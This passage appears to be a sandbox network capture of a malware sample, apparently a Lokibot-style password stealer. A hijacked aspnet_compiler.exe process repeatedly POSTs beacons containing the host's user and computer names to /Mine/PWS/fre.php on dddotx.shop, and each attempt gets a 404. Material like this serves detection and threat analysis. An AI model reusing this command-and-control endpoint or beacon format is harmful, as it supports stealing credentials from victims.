Sep 25, 2024 10:20:24.397758007 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5bJIy3o9EhTXFjlzaRbPcoTpBajJhh0r9SDFtIv4v%2F%2B%2BWMTjRKwDvjw2pngIouEiHhydWzhdAaZRFZh61TTaNeHArJrVU6YenuZVdseHzr1RhshSk4kZj%2Boe8vpXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998428da68c8f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.7	49788	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:24.540045977 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:24.545069933 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:25.365967035 CEST	575	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBbOvRKKYajNu%2FN9N7BR6q%2F6f9jK4wDk8%2FiSAmUoewl%2FATF%2F1SYe2Egm69UCFaAB298E5dxMeFzofVeB%2FZjiddvHoGwfFKMzjxqaJYey%2BHL8B5odJGQpLOknJpIrDg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899847da75c41d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.7	49789	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:25.511182070 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:25.516197920 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:26.201577902 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M06G91N2FVGMNROUj21ArajTcdWS1xC%2BV%2BvOYeJGfUp6%2BnMv%2FaWy8MdTzuzj83k97MXL4V9VjfLTeJ55dFOpenvETXhbctNzIroAa22vj4loWR6QCVWqpN1oNobqaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89984e0efb727b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.7	49790	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:26.362179995 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:26.367186069 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:27.025301933 CEST	587	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3GC%2BTQ%2BuR8ct712CfZymo%2FJa%2Bm4%2FNSLfkjirkP%2B%2B768IDnF%2FCac9iPL1koSGwoyGX%2F3dt3wiPr1lS908Xjep8%2B0sqtU6ZR%2F6LZugilaBo7uMf%2F%2FT9dbSlNE9gmTmg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998534df68cc6-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.7	49791	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:27.182550907 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:27.187594891 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:27.837362051 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMj4GF8CWWp5Z04O3h6mZjPvasKM0tD0AMO9rC%2FVrGzOjYUyF61nJ%2B2TO5v1y%2BCHbY%2FoRy6MGMiZHlTZG0eWcFcHnE1TRGhHzUndrTovL3jfiFUy1cEQZIRu%2BWKOkA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998586aa64378-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.7	49792	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:27.999268055 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:28.005116940 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:28.650580883 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=moiXY1vlYQHlk5ZuybvaRpxNQ6%2BdlTjTOonMBAj71MxXrujiFabEmx%2FD8Rvh9XHWgmx8T9MfDzsFP1l22oEsKDoaPh0giLRjffVPPkAtLggujYXKm2MUmQUlRupYiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89985d7d6472bc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.7	49793	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:28.818383932 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:28.823348045 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:29.642699957 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwSKl9u36nZAANMXUlEtA5DFHzvTAZOuDIKu7oRrQ9KvcCH3MTTIROYrwQuzzSsi9BUssSCSawJZWrH%2FeOQ0n9x8hahldEP4U78p%2FOkATLkc2Y3aIWgM3U8BBIHjAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899862abd97d00-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	49794	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:29.788256884 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:29.793056965 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:30.571324110 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMi%2FZWChQp2LqquGMkMv42SVRnjmNqxStpkbJ3fDdos43BxY0YcpwoSYBrD4sujV1nfhK3UM5cinr3wZh6xLBZ2M%2FfowOTYpvf%2F5nnsNYcuOwTt2iIOoC1AAVK1Pbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899868b986c325-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.7	49795	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:30.718878984 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:30.724247932 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:31.376924038 CEST	603	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yFrQkPkLamDld5W5wriiNQgmC%2BSo9loJFEC8KW6YHzDjC5z4nMUMHvjq%2Fc8Pmbb0CCljcTlfZaOzVln74RXvSMnvvuY2a%2BrSY%2FT7%2B03IrFFasZZLiVaMl3%2BIrIgYbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89986e7fd24337-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.7	49796	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:31.524990082 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:31.529839993 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:32.191046000 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5OVG5YiCMrV84bJ7Zw1%2Flvx%2FtxNuYU7A4O4mu5oqLSc5mCpfTw1272OBzxzh4TkOtTwyTrS3KVUNA1qMwrtjDs9G3a2oj5h1WgahD5v0mNEXV2SV8AiPG54MF0T8qA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998738e6d8ca2-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.7	49797	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:32.344170094 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:32.349270105 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:33.000392914 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmR17Gc5eQ3h8YKUqWePUNU5PpUhhbkOvO7guUo4MUnpFNjla6bH3ur0SryQStd%2FJ7myiw0gfIIFhbFOX2trQ2mxchGnqyRZMWZlFwvGNa2qIERCBeuX%2BPiCx46uaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899878aa494315-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.7	49798	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:33.153882027 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:33.159073114 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:33.843158007 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbyJTwhEpqqdBGaRDsIWx3ZrpPgk3eS5XfLRlvdYek8gx0AEFAbnqYLoViXzOKJPICN%2BxyB9OC%2BTc5WHZb1fNXLQ46ECeWTOs%2FHgw3wGkwaTHw65nPobkhzkXnlAtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89987dbf7743dc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	49799	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:33.999581099 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:34.004750967 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:34.678819895 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlMZDf%2Bn4D65VkD1pzFMRELFZ87KEWLz5ix6NhcZ522XTP%2Bflofa%2FAZz6TdaC568npLz%2Bp8BMqZvJeSpZxB6xtPNF4pseQUuj7DpQ6ETlB%2BNytHtURq1RgsPkwARcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899882fce30fa4-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	49800	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:34.826895952 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:34.831696033 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:35.509651899 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WNY2y%2B2%2Bf%2F8rx3m%2BVYe1dw0%2FQpXGXSI5piq2XkZwyrwbDz71Tn9BoRcH22JBq1uFaDOLzTPtB0W%2Fe8VYJafFLfZz5Gr1pOPSzJbXbRxqqvWktydERy4VeKOeMiJxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8998882bff42c8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	49801	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:35.671930075 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:35.676731110 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:36.333214045 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dc0eKRu3oFLXAXXcg5rARrFFW%2BnRB3PDovlES0eNAaRwQSATtF3Nz5Bf6MndH1RajZ9CYTIYsBYmIg3KfJiclAb2o%2B37nedEn4wkUKMucRnK2W3ndaVbRfyVYKAf1A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89988d7c8543d9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	49802	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:36.483275890 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:36.488105059 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
